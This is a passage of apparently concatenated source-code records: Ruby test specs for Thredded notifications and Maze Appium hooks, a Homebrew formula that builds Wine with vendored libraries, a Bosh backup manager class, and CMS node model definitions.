it { should validate_presence_of(:user_id) }
it { should validate_presence_of(:total) }
end
end
| 22.5 | 48 | 0.707937 |
b9904eb446b55949235f01c6c78f19670d0805d8 | 5,542 | # frozen_string_literal: true
require 'spec_helper'
module Thredded
describe NotifyFollowingUsers do
describe '#targeted_users' do
subject(:targeted_users) { NotifyFollowingUsers.new(post).targeted_users(notifier) }
let(:post) { create(:post, user: poster, postable: topic) }
let(:poster) { create(:user, name: 'poster') }
let!(:follower) { create(:user_topic_follow, user: create(:user, name: 'follower'), topic: topic).user }
let(:topic) { create(:topic, messageboard: messageboard) }
let!(:messageboard) { create(:messageboard) }
let(:notifier) { EmailNotifier.new }
before do
# Creating a post will trigger the NotifyFollowingUsers job, creating UserPostNotification records.
# Create the post and then delete all the created UserPostNotification records for testing.
post
Thredded::UserPostNotification.destroy_all
end
it 'includes followers where preference to receive these notifications' do
create(:notifications_for_followed_topics,
notifier_key: 'email',
user: follower,
enabled: true)
expect(targeted_users).to include(follower)
end
it 'excludes followers that have already been notified' do
expect(Thredded::UserPostNotification.create_from_post_and_user(post, follower)).to be_truthy
expect(targeted_users).not_to include(follower)
end
it "doesn't include the poster, even if they follow" do
expect(UserTopicFollow.find_by(user_id: poster.id, topic_id: topic.id)).not_to be_nil
expect(targeted_users).not_to include(poster)
end
context "when a follower's email notification is turned off" do
before do
create(:notifications_for_followed_topics,
notifier_key: 'email',
user: follower,
enabled: false)
end
it "doesn't include that user" do
expect(targeted_users).not_to include(follower)
end
context 'with the MockNotifier' do
let(:notifier) { MockNotifier.new }
it 'does include that user' do
expect(targeted_users).to include(follower)
end
end
end
context "when a follower's 'mock' notification is turned off (per messageboard)" do
before do
create(:messageboard_notifications_for_followed_topics,
notifier_key: 'mock',
messageboard: messageboard,
user: follower,
enabled: false)
end
context 'with the EmailNotifier' do
let(:notifier) { EmailNotifier.new }
it 'does includes that user' do
expect(targeted_users).to include(follower)
end
end
context 'with the MockNotifier' do
let(:notifier) { MockNotifier.new }
it "doesn't include that user" do
expect(targeted_users).not_to include(follower)
end
end
end
context "when a follower's 'mock' notification is turned off (overall)" do
before do
create(:notifications_for_followed_topics,
notifier_key: 'mock',
user: follower,
enabled: false)
end
context 'with the EmailNotifier' do
let(:notifier) { EmailNotifier.new }
it 'does includes that user' do
expect(targeted_users).to include(follower)
end
end
context 'with the MockNotifier' do
let(:notifier) { MockNotifier.new }
it "doesn't include that user" do
expect(targeted_users).not_to include(follower)
end
end
end
end
describe '#run' do
let(:post) { create(:post) }
let(:command) { NotifyFollowingUsers.new(post) }
let(:targeted_users) { [create(:user)] }
before { allow(command).to receive(:targeted_users).and_return(targeted_users) }
it 'sends email' do
expect { command.run }.to change { ActionMailer::Base.deliveries.count }
# see EmailNotifier spec for more detailed specs
end
context 'with the MockNotifier', thredded_reset: [:@notifiers] do
let(:mock_notifier) { MockNotifier.new }
before { Thredded.notifiers = [mock_notifier] }
it "doesn't send any emails" do
expect { command.run }.not_to change { ActionMailer::Base.deliveries.count }
end
it 'notifies exactly once' do
expect { command.run }.to change(mock_notifier, :users_notified_of_new_post)
expect { command.run }.not_to change(mock_notifier, :users_notified_of_new_post)
end
end
context 'with multiple notifiers', thredded_reset: [:@notifiers] do
let(:mock_notifier1) { MockNotifier.new }
let(:mock_notifier2) { MockNotifier.new }
before { Thredded.notifiers = [mock_notifier1, mock_notifier2] }
def count_users_for_each_notifier
[mock_notifier1.users_notified_of_new_post.length, mock_notifier2.users_notified_of_new_post.length]
end
it 'notifies via all notifiers' do
expect { command.run }
.to change { count_users_for_each_notifier }.from([0, 0]).to([1, 1])
end
it "second run doesn't notify" do
command.run
expect { command.run }
.not_to change { count_users_for_each_notifier }
end
end
end
end
end
| 33.587879 | 110 | 0.624323 |
1ca2c0fa1cc63b7cf0a9556bf56840cb56500c1d | 8,067 | # frozen_string_literal: true
require 'appium_lib'
require_relative '../test_helper'
require_relative '../../lib/maze/capabilities'
require_relative '../../lib/maze/driver/appium'
require_relative '../../lib/maze/driver/resilient_appium'
require_relative '../../lib/maze/hooks/appium_hooks'
class AppiumHooksTest < Test::Unit::TestCase
def setup
$logger = mock('logger')
$config = mock('config')
Maze.stubs(:config).returns($config)
end
def test_device_capabilities_bs
$config.expects(:farm).returns(:bs)
$config.expects(:device).returns(:device)
$config.expects(:appium_version).returns(:appium_version)
$config.expects(:capabilities_option).returns(:capabilities_option)
$config.expects(:app).returns(:app)
caps_base = {}
Maze::Capabilities.expects(:for_browser_stack_device).with(
:device,
:tunnel_id,
:appium_version,
:capabilities_option
).returns(caps_base)
hooks = Maze::Hooks::AppiumHooks.new
caps = hooks.device_capabilities($config, :tunnel_id)
assert_equal(caps, caps_base)
assert_equal(:app, caps['app'])
end
def test_device_capabilities_local
$config.expects(:farm).returns(:local)
$config.expects(:os).returns(:os)
$config.expects(:capabilities_option).returns(:capabilities_option)
$config.expects(:apple_team_id).returns(:apple_team_id)
$config.expects(:device_id).returns(:device_id)
$config.expects(:app).returns(:app)
caps_base = {}
Maze::Capabilities.expects(:for_local).with(
:os,
:capabilities_option,
:apple_team_id,
:device_id
).returns(caps_base)
hooks = Maze::Hooks::AppiumHooks.new
caps = hooks.device_capabilities($config)
assert_equal(caps, caps_base)
assert_equal(:app, caps['app'])
end
def test_create_driver_resilient
$config.expects(:resilient).returns(true)
$config.expects(:appium_server_url).returns(:appium_server_url)
$config.expects(:capabilities).returns(:capabilities)
$config.expects(:locator).returns(:locator)
$logger.expects(:info).with('Creating ResilientAppium driver instance')
Maze::Driver::ResilientAppium.expects(:new).with(
:appium_server_url,
:capabilities,
:locator
).returns(:driver)
hooks = Maze::Hooks::AppiumHooks.new
driver = hooks.create_driver($config)
assert_equal(:driver, driver)
end
def test_create_driver_default
$config.expects(:resilient).returns(false)
$config.expects(:appium_server_url).returns(:appium_server_url)
$config.expects(:capabilities).returns(:capabilities)
$config.expects(:locator).returns(:locator)
$logger.expects(:info).with('Creating Appium driver instance')
Maze::Driver::Appium.expects(:new).with(
:appium_server_url,
:capabilities,
:locator
).returns(:driver)
hooks = Maze::Hooks::AppiumHooks.new
driver = hooks.create_driver($config)
assert_equal(:driver, driver)
end
def test_start_driver_success
driver_mock = mock('driver')
driver_mock.expects(:start_driver)
Maze.expects(:driver).twice.returns(false, true)
Maze.expects(:driver=).with(driver_mock)
hooks = Maze::Hooks::AppiumHooks.new
hooks.expects(:device_capabilities).with($config, nil).returns(:caps)
hooks.expects(:create_driver).with($config).returns(driver_mock)
$config.expects(:capabilities=).with(:caps)
$config.expects(:appium_session_isolation).returns(false)
hooks.start_driver($config)
end
def test_start_driver_fails_once
driver_mock = mock('driver')
driver_mock.expects(:start_driver).raises(Selenium::WebDriver::Error::UnknownError)
Maze.expects(:driver).returns(false)
hooks = Maze::Hooks::AppiumHooks.new
hooks.expects(:device_capabilities).with($config, nil).returns(:caps)
hooks.expects(:create_driver).with($config).returns(driver_mock)
$config.expects(:capabilities=).with(:caps)
$config.expects(:appium_session_isolation).returns(false)
$config.expects(:device).returns(:device)
$config.expects(:farm).returns(:farm)
$config.expects(:device_list).returns([])
$logger.expects(:warn).with("Attempt to acquire #{:device} device from farm #{:farm} failed")
$logger.expects(:warn).with("Exception: #{Selenium::WebDriver::Error::UnknownError.new.message}")
$logger.expects(:error).with('No further devices to try - raising original exception')
assert_raise Selenium::WebDriver::Error::UnknownError do
hooks.start_driver($config)
end
end
def test_start_driver_fails_then_succeeds
driver_mock = mock('driver')
driver_mock.expects(:start_driver).twice.raises(Selenium::WebDriver::Error::UnknownError).then.returns(true)
Maze.expects(:driver).times(3).returns(false, false, true)
hooks = Maze::Hooks::AppiumHooks.new
hooks.expects(:device_capabilities).twice.with($config, nil).returns(:caps)
hooks.expects(:create_driver).twice.with($config).returns(driver_mock)
$config.expects(:capabilities=).twice.with(:caps)
$config.expects(:appium_session_isolation).twice.returns(false)
$config.expects(:device).twice.returns(:device)
$config.expects(:farm).returns(:farm)
device_list = mock('device_list')
$config.stubs(:device_list).returns(device_list)
$config.expects(:device_list=).with(device_list)
$config.expects(:device=).with(:next_device)
device_list.expects(:empty?).returns(false)
device_list.expects(:first).returns(:next_device)
device_list.expects(:drop).with(1).returns(device_list)
$logger.expects(:warn).with("Attempt to acquire #{:device} device from farm #{:farm} failed")
$logger.expects(:warn).with("Exception: #{Selenium::WebDriver::Error::UnknownError.new.message}")
$logger.expects(:warn).with("Retrying driver initialisation using next device: #{:device}")
Maze.expects(:driver=).with(driver_mock)
hooks.start_driver($config)
end
def test_start_driver_fails_multiple_times
driver_mock = mock('driver')
driver_mock.expects(:start_driver).times(3).raises(Selenium::WebDriver::Error::UnknownError)
Maze.expects(:driver).times(3).returns(false, false, false)
hooks = Maze::Hooks::AppiumHooks.new
hooks.expects(:device_capabilities).times(3).with($config, nil).returns(:caps)
hooks.expects(:create_driver).times(3).with($config).returns(driver_mock)
$config.expects(:capabilities=).times(3).with(:caps)
$config.expects(:appium_session_isolation).times(3).returns(false)
$config.expects(:device).times(5).returns(:device)
$config.expects(:farm).times(3).returns(:farm)
device_list = mock('device_list')
$config.stubs(:device_list).returns(device_list)
$config.expects(:device_list=).twice.with(device_list)
$config.expects(:device=).twice.with(:next_device)
device_list.expects(:empty?).times(3).returns(false, false, true)
device_list.expects(:first).twice.returns(:next_device)
device_list.expects(:drop).with(1).twice.returns(device_list)
$logger.expects(:warn).times(3).with("Attempt to acquire #{:device} device from farm #{:farm} failed")
$logger.expects(:warn).times(3).with("Exception: #{Selenium::WebDriver::Error::UnknownError.new.message}")
$logger.expects(:warn).twice.with("Retrying driver initialisation using next device: #{:device}")
$logger.expects(:error).with('No further devices to try - raising original exception')
assert_raise Selenium::WebDriver::Error::UnknownError do
hooks.start_driver($config)
end
end
def test_start_driver_session_isolation
driver_mock = mock('driver')
Maze.expects(:driver).twice.returns(false, true)
Maze.expects(:driver=).with(driver_mock)
hooks = Maze::Hooks::AppiumHooks.new
hooks.expects(:device_capabilities).with($config, nil).returns(:caps)
hooks.expects(:create_driver).with($config).returns(driver_mock)
$config.expects(:capabilities=).with(:caps)
$config.expects(:appium_session_isolation).returns(true)
hooks.start_driver($config)
end
end
| 36.174888 | 112 | 0.719598 |
1de3180473f05d6bf0b911ccfbd83e14f96b6ee7 | 20,341 | # NOTE: When updating Wine, please make sure to match Wine-Gecko and Wine-Mono
# versions:
# - https://wiki.winehq.org/Gecko
# - https://wiki.winehq.org/Mono
# with `GECKO_VERSION` and `MONO_VERSION`, as in:
# https://source.winehq.org/git/wine.git/blob/refs/tags/wine-3.0:/dlls/appwiz.cpl/addons.c
class Wine < Formula
desc "Run Windows applications without a copy of Microsoft Windows"
homepage "https://www.winehq.org/"
revision 1
stable do
url "https://dl.winehq.org/wine/source/3.0/wine-3.0.2.tar.xz"
mirror "https://downloads.sourceforge.net/project/wine/Source/wine-3.0.2.tar.xz"
sha256 "cad771375409e24244eab252da044306158af8a8bea4432e7ca81c1dc6b463ff"
# Patch to fix screen-flickering issues. Still relevant on 3.0.
# https://bugs.winehq.org/show_bug.cgi?id=34166
patch do
url "https://raw.githubusercontent.com/Homebrew/formula-patches/74c2566/wine/2.14.patch"
sha256 "6907471d18996ada60cc0cbc8462a1698e90720c0882846dfbfb163e5d3899b8"
end
resource "mono" do
url "https://dl.winehq.org/wine/wine-mono/4.7.1/wine-mono-4.7.1.msi"
sha256 "2c8d5db7f833c3413b2519991f5af1f433d59a927564ec6f38a3f1f8b2c629aa"
end
end
bottle do
rebuild 1
sha256 "8f214b6291164461664d6b48af8db303a94293ee85ce6de9eb8d4b3d959a5775" => :high_sierra_or_later
sha256 "682e3be7ce2094501b00bb8835fd7fd6c72273554aa22ad2de8d21a522aeed26" => :sierra
sha256 "8263513cedd9086122996f4233ff3449bbe2b0c8e759392843cc18d83a44f070" => :el_capitan
end
devel do
url "https://dl.winehq.org/wine/source/3.x/wine-3.17.tar.xz"
mirror "https://downloads.sourceforge.net/project/wine/Source/wine-3.17.tar.xz"
sha256 "4cede2e1de426af2430abee84afd77379a1f4f05c3ec9cd4280110de54fccc21"
resource "mono" do
url "https://dl.winehq.org/wine/wine-mono/4.7.1/wine-mono-4.7.1.msi"
sha256 "2c8d5db7f833c3413b2519991f5af1f433d59a927564ec6f38a3f1f8b2c629aa"
end
# Does not build with Xcode 10, used on High Sierra and Mojave
depends_on MaximumMacOSRequirement => :sierra
end
head do
url "https://source.winehq.org/git/wine.git"
resource "mono" do
url "https://dl.winehq.org/wine/wine-mono/4.7.1/wine-mono-4.7.1.msi"
sha256 "2c8d5db7f833c3413b2519991f5af1f433d59a927564ec6f38a3f1f8b2c629aa"
end
# Does not build with Xcode 10, used on High Sierra and Mojave
depends_on MaximumMacOSRequirement => :sierra
end
depends_on "cmake" => :build
depends_on "makedepend" => :build
depends_on "pkg-config" => :build
depends_on :macos => :el_capitan
fails_with :clang do
build 425
cause "Clang prior to Xcode 5 miscompiles some parts of wine"
end
resource "gecko-x86" do
url "https://dl.winehq.org/wine/wine-gecko/2.47/wine_gecko-2.47-x86.msi"
sha256 "3b8a361f5d63952d21caafd74e849a774994822fb96c5922b01d554f1677643a"
end
resource "gecko-x86_64" do
url "https://dl.winehq.org/wine/wine-gecko/2.47/wine_gecko-2.47-x86_64.msi"
sha256 "c565ea25e50ea953937d4ab01299e4306da4a556946327d253ea9b28357e4a7d"
end
resource "openssl" do
url "https://www.openssl.org/source/openssl-1.0.2p.tar.gz"
mirror "https://dl.bintray.com/homebrew/mirror/openssl--1.0.2p.tar.gz"
sha256 "50a98e07b1a89eb8f6a99477f262df71c6fa7bef77df4dc83025a2845c827d00"
end
resource "libtool" do
url "https://ftp.gnu.org/gnu/libtool/libtool-2.4.6.tar.xz"
mirror "https://ftpmirror.gnu.org/libtool/libtool-2.4.6.tar.xz"
sha256 "7c87a8c2c8c0fc9cd5019e402bed4292462d00a718a7cd5f11218153bf28b26f"
end
resource "jpeg" do
url "https://www.ijg.org/files/jpegsrc.v9c.tar.gz"
mirror "https://fossies.org/linux/misc/jpegsrc.v9c.tar.gz"
sha256 "650250979303a649e21f87b5ccd02672af1ea6954b911342ea491f351ceb7122"
end
resource "libtiff" do
url "https://download.osgeo.org/libtiff/tiff-4.0.9.tar.gz"
mirror "https://fossies.org/linux/misc/tiff-4.0.9.tar.gz"
sha256 "6e7bdeec2c310734e734d19aae3a71ebe37a4d842e0e23dbb1b8921c0026cfcd"
# All of these have been reported upstream & should
# be fixed in the next release, but please check.
patch do
url "https://mirrors.ocf.berkeley.edu/debian/pool/main/t/tiff/tiff_4.0.9-6.debian.tar.xz"
mirror "https://mirrorservice.org/sites/ftp.debian.org/debian/pool/main/t/tiff/tiff_4.0.9-6.debian.tar.xz"
sha256 "4e145dcde596e0c406a9f482680f9ddd09bed61a0dc6d3ac7e4c77c8ae2dd383"
apply "patches/CVE-2017-9935.patch",
"patches/CVE-2017-18013.patch",
"patches/CVE-2018-5784.patch",
"patches/CVE-2017-11613_part1.patch",
"patches/CVE-2017-11613_part2.patch",
"patches/CVE-2018-7456.patch",
"patches/CVE-2017-17095.patch",
"patches/CVE-2018-8905.patch",
"patches/CVE-2018-10963.patch"
end
end
resource "little-cms2" do
url "https://downloads.sourceforge.net/project/lcms/lcms/2.9/lcms2-2.9.tar.gz"
mirror "https://mirrors.kernel.org/debian/pool/main/l/lcms2/lcms2_2.9.orig.tar.gz"
sha256 "48c6fdf98396fa245ed86e622028caf49b96fa22f3e5734f853f806fbc8e7d20"
end
resource "libpng" do
url "https://downloads.sourceforge.net/libpng/libpng-1.6.35.tar.xz"
mirror "https://sourceforge.mirrorservice.org/l/li/libpng/libpng16/1.6.35/libpng-1.6.35.tar.xz"
sha256 "23912ec8c9584917ed9b09c5023465d71709dce089be503c7867fec68a93bcd7"
end
resource "freetype" do
url "https://downloads.sourceforge.net/project/freetype/freetype2/2.9.1/freetype-2.9.1.tar.bz2"
mirror "https://download.savannah.gnu.org/releases/freetype/freetype-2.9.1.tar.bz2"
sha256 "db8d87ea720ea9d5edc5388fc7a0497bb11ba9fe972245e0f7f4c7e8b1e1e84d"
end
resource "libusb" do
url "https://github.com/libusb/libusb/releases/download/v1.0.22/libusb-1.0.22.tar.bz2"
mirror "https://downloads.sourceforge.net/project/libusb/libusb-1.0/libusb-1.0.22/libusb-1.0.22.tar.bz2"
sha256 "75aeb9d59a4fdb800d329a545c2e6799f732362193b465ea198f2aa275518157"
end
resource "webp" do
url "https://storage.googleapis.com/downloads.webmproject.org/releases/webp/libwebp-1.0.0.tar.gz"
sha256 "84259c4388f18637af3c5a6361536d754a5394492f91be1abc2e981d4983225b"
end
resource "fontconfig" do
url "https://www.freedesktop.org/software/fontconfig/release/fontconfig-2.13.0.tar.bz2"
mirror "https://ftp.osuosl.org/pub/blfs/conglomeration/fontconfig/fontconfig-2.13.0.tar.bz2"
sha256 "91dde8492155b7f34bb95079e79be92f1df353fcc682c19be90762fd3e12eeb9"
end
resource "gd" do
url "https://github.com/libgd/libgd/releases/download/gd-2.2.5/libgd-2.2.5.tar.xz"
mirror "https://src.fedoraproject.org/repo/pkgs/gd/libgd-2.2.5.tar.xz/sha512/946675b0a9dbecdee3dda927d496a35d6b5b071d3252a82cd649db0d959a82fcc65ce067ec34d07eed0e0497cd92cc0d93803609a4854f42d284e950764044d0/libgd-2.2.5.tar.xz"
sha256 "8c302ccbf467faec732f0741a859eef4ecae22fea2d2ab87467be940842bde51"
end
resource "libgphoto2" do
url "https://downloads.sourceforge.net/project/gphoto/libgphoto/2.5.19/libgphoto2-2.5.19.tar.bz2"
sha256 "62523e52e3b8542301e072635b518387f2bd0948347775cf10cb2da9a6612c63"
end
resource "net-snmp" do
url "https://downloads.sourceforge.net/project/net-snmp/net-snmp/5.8/net-snmp-5.8.tar.gz"
sha256 "b2fc3500840ebe532734c4786b0da4ef0a5f67e51ef4c86b3345d697e4976adf"
end
resource "sane-backends" do
url "https://mirrors.kernel.org/debian/pool/main/s/sane-backends/sane-backends_1.0.27.orig.tar.gz"
mirror "https://fossies.org/linux/misc/sane-backends-1.0.27.tar.gz"
sha256 "293747bf37275c424ebb2c833f8588601a60b2f9653945d5a3194875355e36c9"
end
resource "mpg123" do
url "https://downloads.sourceforge.net/project/mpg123/mpg123/1.25.10/mpg123-1.25.10.tar.bz2"
mirror "https://www.mpg123.de/download/mpg123-1.25.10.tar.bz2"
sha256 "6c1337aee2e4bf993299851c70b7db11faec785303cfca3a5c3eb5f329ba7023"
end
def openssl_arch_args
{
:x86_64 => %w[darwin64-x86_64-cc enable-ec_nistp_64_gcc_128],
:i386 => %w[darwin-i386-cc],
}
end
# Store and restore some of our environment
def save_env
saved_cflags = ENV["CFLAGS"]
saved_ldflags = ENV["LDFLAGS"]
saved_homebrew_archflags = ENV["HOMEBREW_ARCHFLAGS"]
saved_homebrew_cccfg = ENV["HOMEBREW_CCCFG"]
saved_makeflags = ENV["MAKEFLAGS"]
saved_homebrew_optflags = ENV["HOMEBREW_OPTFLAGS"]
begin
yield
ensure
ENV["CFLAGS"] = saved_cflags
ENV["LDFLAGS"] = saved_ldflags
ENV["HOMEBREW_ARCHFLAGS"] = saved_homebrew_archflags
ENV["HOMEBREW_CCCFG"] = saved_homebrew_cccfg
ENV["MAKEFLAGS"] = saved_makeflags
ENV["HOMEBREW_OPTFLAGS"] = saved_homebrew_optflags
end
end
def install
# 32-bit support has been removed by Apple.
if DevelopmentTools.clang_build_version >= 1000
odie <<~EOS
Wine cannot currently be installed from source on
macOS #{MacOS.version}.
You may wish to try:
brew install wine --force-bottle
EOS
end
ENV.prepend_create_path "PATH", "#{libexec}/bin"
ENV.prepend_create_path "PKG_CONFIG_PATH", "#{libexec}/lib/pkgconfig"
resource("openssl").stage do
save_env do
ENV.deparallelize
ENV.permit_arch_flags
# OpenSSL will prefer the PERL environment variable if set over $PATH
# which can cause some odd edge cases & isn't intended. Unset for safety,
# along with perl modules in PERL5LIB.
ENV.delete("PERL")
ENV.delete("PERL5LIB")
archs = Hardware::CPU.universal_archs
dirs = []
archs.each do |arch|
dir = "build-#{arch}"
dirs << dir
mkdir_p "#{dir}/engines"
system "make", "clean"
system "perl", "./Configure", "--prefix=#{libexec}",
"no-ssl2",
"no-ssl3",
"no-zlib",
"shared",
"enable-cms",
*openssl_arch_args[arch]
system "make", "depend"
system "make"
cp "include/openssl/opensslconf.h", dir
cp Dir["*.?.?.?.dylib", "*.a", "apps/openssl"], dir
cp Dir["engines/**/*.dylib"], "#{dir}/engines"
end
system "make", "install"
%w[libcrypto libssl].each do |libname|
rm_f libexec/"lib/#{libname}.1.0.0.dylib"
MachO::Tools.merge_machos("#{libexec}/lib/#{libname}.1.0.0.dylib",
"#{dirs.first}/#{libname}.1.0.0.dylib",
"#{dirs.last}/#{libname}.1.0.0.dylib")
rm_f libexec/"lib/#{libname}.a"
end
Dir.glob("#{dirs.first}/engines/*.dylib") do |engine|
libname = File.basename(engine)
rm_f libexec/"lib/engines/#{libname}"
MachO::Tools.merge_machos("#{libexec}/lib/engines/#{libname}",
"#{dirs.first}/engines/#{libname}",
"#{dirs.last}/engines/#{libname}")
end
MachO::Tools.merge_machos("#{libexec}/bin/openssl",
"#{dirs.first}/openssl",
"#{dirs.last}/openssl")
confs = archs.map do |arch|
<<~EOS
#ifdef __#{arch}__
#{(Pathname.pwd/"build-#{arch}/opensslconf.h").read}
#endif
EOS
end
(libexec/"include/openssl/opensslconf.h").atomic_write confs.join("\n")
end
end
depflags = ["CPPFLAGS=-I#{libexec}/include", "LDFLAGS=-L#{libexec}/lib"]
# All other resources use ENV.universal_binary
save_env do
ENV.universal_binary
resource("libtool").stage do
ENV["SED"] = "sed" # prevent libtool from hardcoding sed path from superenv
system "./configure", "--disable-dependency-tracking",
"--prefix=#{libexec}",
"--disable-static",
"--program-prefix=g",
"--enable-ltdl-install"
system "make", "install"
end
resource("jpeg").stage do
system "./configure", "--disable-dependency-tracking",
"--prefix=#{libexec}",
"--disable-static"
system "make", "install"
end
resource("libtiff").stage do
system "./configure", "--disable-dependency-tracking",
"--prefix=#{libexec}",
"--disable-static",
"--disable-lzma",
"--without-x",
"--with-jpeg-lib-dir=#{libexec}/lib",
"--with-jpeg-include-dir=#{libexec}/include"
system "make", "install"
end
resource("little-cms2").stage do
system "./configure", "--disable-dependency-tracking",
"--prefix=#{libexec}",
"--disable-static",
"--with-jpeg=#{libexec}",
"--with-tiff=#{libexec}"
system "make", "install"
end
resource("libpng").stage do
system "./configure", "--disable-dependency-tracking",
"--prefix=#{libexec}",
"--disable-static"
system "make", "install"
end
resource("freetype").stage do
system "./configure", "--prefix=#{libexec}",
"--disable-static",
"--without-harfbuzz",
*depflags
system "make", "install"
end
resource("libusb").stage do
system "./configure", "--disable-dependency-tracking",
"--prefix=#{libexec}",
"--disable-static"
system "make", "install"
end
resource("webp").stage do
system "./configure", "--disable-dependency-tracking",
"--prefix=#{libexec}",
"--disable-static",
"--disable-gl",
"--enable-libwebpmux",
"--enable-libwebpdemux",
"--enable-libwebpdecoder",
*depflags
system "make", "install"
end
resource("fontconfig").stage do
# Remove for fontconfig > 2.13.0
# Upstream issue from 6 Mar 2018 "2.13.0 erroneously requires libuuid on macOS"
# See https://bugs.freedesktop.org/show_bug.cgi?id=105366
ENV["UUID_CFLAGS"] = " "
ENV["UUID_LIBS"] = " "
# Remove for fontconfig > 2.13.0
# Same effect as upstream commit from 10 Mar 2018 "Add uuid to
# Requires.private in .pc only when pkgconfig macro found it"
inreplace "configure",
'PKGCONFIG_REQUIRES_PRIVATELY="$PKGCONFIG_REQUIRES_PRIVATELY uuid"',
""
system "./configure", "--disable-dependency-tracking",
"--prefix=#{libexec}",
"--disable-static",
"--with-add-fonts=/System/Library/Fonts,/Library/Fonts,~/Library/Fonts",
"--localstatedir=#{var}/vendored_wine_fontconfig",
"--sysconfdir=#{prefix}",
*depflags
system "make", "install", "RUN_FC_CACHE_TEST=false"
end
resource("gd").stage do
system "./configure", "--disable-dependency-tracking",
"--prefix=#{libexec}",
"--disable-static",
"--without-x",
"--without-xpm",
"--with-png=#{libexec}",
"--with-fontconfig=#{libexec}",
"--with-freetype=#{libexec}",
"--with-jpeg=#{libexec}",
"--with-tiff=#{libexec}",
"--with-webp=#{libexec}"
system "make", "install"
end
resource("libgphoto2").stage do
system "./configure", "--disable-dependency-tracking",
"--prefix=#{libexec}",
*depflags
system "make", "install"
end
resource("net-snmp").stage do
# https://sourceforge.net/p/net-snmp/bugs/2504/
ln_s "darwin13.h", "include/net-snmp/system/darwin18.h"
system "./configure", "--disable-debugging",
"--prefix=#{libexec}",
"--disable-static",
"--enable-ipv6",
"--with-defaults",
"--with-persistent-directory=#{var}/db/net-snmp_vendored_wine",
"--with-logfile=#{var}/log/snmpd_vendored_wine.log",
"--with-mib-modules=host\ ucd-snmp/diskio",
"--without-rpm",
"--without-kmem-usage",
"--disable-embedded-perl",
"--without-perl-modules",
"--with-openssl=#{libexec}",
*depflags
system "make"
system "make", "install"
end
resource("sane-backends").stage do
save_env do
system "./configure", "--disable-dependency-tracking",
"--prefix=#{libexec}",
"--localstatedir=#{var}",
"--without-gphoto2",
"--enable-local-backends",
"--with-usb=yes",
*depflags
# Remove for > 1.0.27
# Workaround for bug in Makefile.am described here:
# https://lists.alioth.debian.org/pipermail/sane-devel/2017-August/035576.html.
# Fixed in https://anonscm.debian.org/cgit/sane/sane-backends.git/commit/?id=519ff57
system "make"
system "make", "install"
end
end
resource("mpg123").stage do
system "./configure", "--disable-debug",
"--disable-dependency-tracking",
"--prefix=#{libexec}",
"--with-default-audio=coreaudio",
"--with-module-suffix=.so",
"--with-cpu=generic"
system "make", "install"
end
end
# Help wine find our libraries at runtime
%w[freetype jpeg png sane tiff].each do |dep|
ENV["ac_cv_lib_soname_#{dep}"] = (libexec/"lib/lib#{dep}.dylib").realpath
end
mkdir "wine-64-build" do
system "../configure", "--prefix=#{prefix}",
"--enable-win64",
"--without-x",
*depflags
system "make", "install"
end
mkdir "wine-32-build" do
ENV.m32
system "../configure", "--prefix=#{prefix}",
"--with-wine64=../wine-64-build",
"--without-x",
*depflags
system "make", "install"
end
(pkgshare/"gecko").install resource("gecko-x86")
(pkgshare/"gecko").install resource("gecko-x86_64")
(pkgshare/"mono").install resource("mono")
end
def post_install
# For fontconfig
ohai "Regenerating font cache, this may take a while"
system "#{libexec}/bin/fc-cache", "-frv"
# For net-snmp
(var/"db/net-snmp_vendored_wine").mkpath
(var/"log").mkpath
end
def caveats; <<~EOS
You may also want winetricks:
brew install winetricks
EOS
end
test do
assert_equal shell_output("hostname").chomp, shell_output("#{bin}/wine hostname.exe 2>/dev/null").chomp
assert_equal shell_output("hostname").chomp, shell_output("#{bin}/wine64 hostname.exe 2>/dev/null").chomp
end
end
| 39.497087 | 229 | 0.582567 |
bf67aa21a0650d17ef79416d810f35bfac7224a4 | 338 | module Bosh::Director
module Api
class BackupManager
attr_accessor :destination_path
def initialize
@destination_path = '/var/vcap/store/director/backup.tgz'
end
def create_backup(user)
JobQueue.new.enqueue(user, Jobs::Backup, 'bosh backup', [destination_path])
end
end
end
end
| 21.125 | 83 | 0.66568 |
e8626b7f8fd9cf9a91bb2399fcf5eb8fc9b7e713 | 3,051 | class Cms::Node
include Cms::Model::Node
include Cms::PluginRepository
include Cms::Addon::NodeSetting
include Cms::Addon::EditorSetting
include Cms::Addon::GroupPermission
include Cms::Addon::NodeAutoPostSetting
include Cms::Addon::ForMemberNode
index({ site_id: 1, filename: 1 }, { unique: true })
class Base
include Cms::Model::Node
default_scope ->{ where(route: /^cms\//) }
end
class Node
include Cms::Model::Node
include Cms::Addon::NodeSetting
include Cms::Addon::Meta
include Cms::Addon::EditorSetting
include Cms::Addon::NodeAutoPostSetting
include Cms::Addon::NodeList
include Cms::Addon::Form::Node
include Cms::Addon::ChildList
include Cms::Addon::ForMemberNode
include Cms::Addon::Release
include Cms::Addon::GroupPermission
include History::Addon::Backup
default_scope ->{ where(route: "cms/node") }
end
class Page
include Cms::Model::Node
include Cms::Addon::NodeSetting
include Cms::Addon::Meta
include Cms::Addon::EditorSetting
include Cms::Addon::NodeAutoPostSetting
include Event::Addon::PageList
include Cms::Addon::Form::Node
include Cms::Addon::Release
include Cms::Addon::DefaultReleasePlan
include Cms::Addon::MaxFileSizeSetting
include Cms::Addon::GroupPermission
include History::Addon::Backup
include Cms::ChildList
default_scope ->{ where(route: "cms/page") }
end
class ImportNode
include Cms::Model::Node
include Cms::Addon::NodeSetting
include Cms::Addon::Meta
include Cms::Addon::PageList
include Cms::Addon::Release
include Cms::Addon::GroupPermission
include History::Addon::Backup
include Cms::Addon::Import::Page
default_scope ->{ where(route: "cms/import_node") }
end
class Archive
include Cms::Model::Node
include Cms::Addon::NodeSetting
include Cms::Addon::Meta
include Cms::Addon::ArchiveViewSwitcher
include Cms::Addon::PageList
include Cms::Addon::Release
include Cms::Addon::GroupPermission
include History::Addon::Backup
default_scope ->{ where(route: "cms/archive") }
end
class GroupPage
include Cms::Model::Node
include Cms::Addon::NodeSetting
include Cms::Addon::PageGroupList
include History::Addon::Backup
default_scope ->{ where(route: "cms/group_page") }
end
class PhotoAlbum
include Cms::Model::Node
include Cms::Addon::NodeSetting
include Cms::Addon::Meta
include Cms::Addon::PageList
include Cms::Addon::Release
include Cms::Addon::GroupPermission
include History::Addon::Backup
default_scope ->{ where(route: "cms/photo_album") }
def condition_hash
cond = []
cond << { filename: /^#{filename}\// } if conditions.blank?
conditions.each do |url|
node = Cms::Node.site(cur_site || site).filename(url).first rescue nil
next unless node
cond << { filename: /^#{node.filename}\//, depth: node.depth + 1 }
end
{ '$or' => cond }
end
end
end
| 27 | 78 | 0.678466 |
